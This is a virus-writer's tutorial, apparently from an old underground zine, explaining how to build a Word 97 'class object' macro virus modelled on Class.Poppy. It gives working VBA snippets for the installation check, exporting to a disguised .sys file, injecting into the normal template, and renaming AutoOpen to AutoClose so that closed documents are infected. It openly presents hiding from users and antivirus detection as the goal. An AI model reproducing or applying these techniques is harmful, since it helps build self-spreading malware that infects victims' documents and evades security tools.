What is "Class Object Infection" ?
by VicodinES /CB /TNN
*What is it? Is it any better than a regular macro virus?
Currently all Word 97 macro viruses contain Modules and these Modules then contain the macro subroutines and functions. A "Class Object" macro virus does not have a
Module and therefore can not be seen in the Word 97 Macro Organizer. This gives us our first advantage - you no longer have to bother hooking File|Templates because
even if the user pulls up the File|Templates menu they will not see any macros! "Class" macros can not be seen in the "Macro Organizer"
Now you see one advantage, well there are others. A "Class Macro" can not just be deleted from the Visual Basic Editor. So even if the user discovers your "Class Virus"
he/she must actually highlight the code, select it and then delete it. It's not as easy as just deleting a module. Plus if they do not look close enough they may just think
Word is mistaken and that they do not have a virus since there are no Modules in the document. Also many AV's use the Module name to help them find and identify a
macro virus but a "Class Virus" does not have a Module name and they must rely on a scan string.
*What are the rules of a "Class Virus" ?
A "Class Virus" has a few different constraints than a regular Word 97 macro virus. First you can not have the same subroutine or function in both an infected document
and infected normal template. For example this is a list of the subroutines in Class.Poppy :
>Infected Document< >Infected Normal Template<
AutoOpen - AutoClose
ViewVBCode - ToolsMacro
The code is essentially the same (except for a few minor changes) in both the infected document and the infected normal template but the subroutine names have to be
different. Also you can not have public variables they all must be private. I decided to just stay away from private declarations just to make it easier for my first "Class
Virus"
*How does it work? How can I write one?
The first thing to figure out is where do you write your code. The virus code is written in the "Microsoft Word Objects" section in the Visual Basic Editor. This is where you
write your subroutines.
To reference your code you must always point to item(1) in the visual basic components. Just like this example of Item(1) for the active document:
ActiveDocument.VBProject.VBComponents.Item(1)
Item(1) is always the "ThisDocument" part of your Word document(^1). This is the section you want to infect.
You will also need to figure out if you are already installed. You can not use the old method of checking for your module name in all the visual basic components because
there is no module or module name. The way to check it is to see if any code exists in Item(1). 99.9% of the time this section of documents and templates will be empty
so all you have to do is check for any code. Just count the number of lines and if there are zero lines of code then it's safe to infect. For example this check of a normal
template:
NormalTemplate.VBProject.VBComponents.Item(1).codemodule.CountOfLines
So if the value returned is not zero then your already installed but if the value is zero then you need to infect the normal template.
To get your code out of the active document and into the normal template (to infect the normal template) is a bit tricky. You can not simply copy the code there.
OrganizerCopy and WordBasic.MacroCopy do not work and you can't just Export and then Import code into Item(1). First thing to do is get your code out of the active
document. You can do this with the basic export function. Such as this example from Class.Poppy:
ActiveDocument.VBProject.VBComponents.Item(1).Export "c:\class.sys"
I exported it to class.sys just because sys files are hidden files by default. You could use any name you want to but I decided to uses sys because it looks like it should
be there if the user stumbles on to it.
Now that we have exported our code we need to bring it into the normal template to complete the infection. The way to do this is to add it from the file class.sys (the
import command will not work). This exmaple from Class.Poppy shows how it's done:
Set host = NormalTemplate.VBProject.VBComponents.Item(1)
host.codemodule.AddFromFile ("c:\class.sys")
I set "host" as the object to import into since it's easier to continue to reference "host".
Ok so we imported our code (class.sys) into the normal template but there is a big BIG problem. The first four lines are invalid. We imported these lines of code also (they
are automatically generated during the export):
VERSION 1.0 CLASS
BEGIN
MultiUse = -1 'True
End
That is going to cause an error in our code and we need to remove it! That can easily be done with the deletelines command. For example (notice I still reference "host"
from above):
With host.codemodule
For x = 1 To 4
.deletelines 1
Next x
End With
I delete line 1 four times. This way I remove all the extra code that I don't need and don't want.
So are we done? Nope! We now have two identical codemodules in Item(1). Both have the subroutine AutoOpen and as I stated before that will not work - Word will give us
an error and we will fail to spread. So what we need to do is replace "Sub AutoOpen()" with something else. What we can do is replace it (in the normal template only)
with a new subroutine name. One that will work good with infection. I decided to go with AutoClose so all documents that are closed will become infected. Here is the
example:
host.codemodule.replaceline 1, "Sub AutoClose()"
I knew "Sub AutoOpen()" would be line 1 since I previously just removed the first four lines.
*We done?
And that should do it. We managed to check to see if we were installed. Then since we weren't we exported our code and added it in for the infection. We cleaned up our
extra lines and did the subroutines name change. That's all it takes :-) ... well a few other things can be done, such as polymorphism, a payload and some stealth. Check
out the code for Class.Poppy if you want to see how that is done.
*Any extra suggestions?
Oh ok - the most fun thing you can do is swamp your Item(1) name just before you export your code. This way the virus will adapt its Item(1) name to any Non-English
version of Word. It can be done like this:
ActiveDocument.VBProject.VBComponents.Item(1).Name = _
NormalTemplate.VBProject.VBComponents.Item(1).Name
Do This right before your export and if the normal template Item(1) has a different name then the document Item(1) then it will adopt this new name and if the names are
the same then nothing will change!
Peace, VicodinES
Facts:
Class.Poppy was the first virus to do any of this.
Slage Hammer helped me test on Non-English versions.
The export to sys file was first done by Reptile/29A.
Footnote:
^1 - it may be called other things in Non-English versions of Word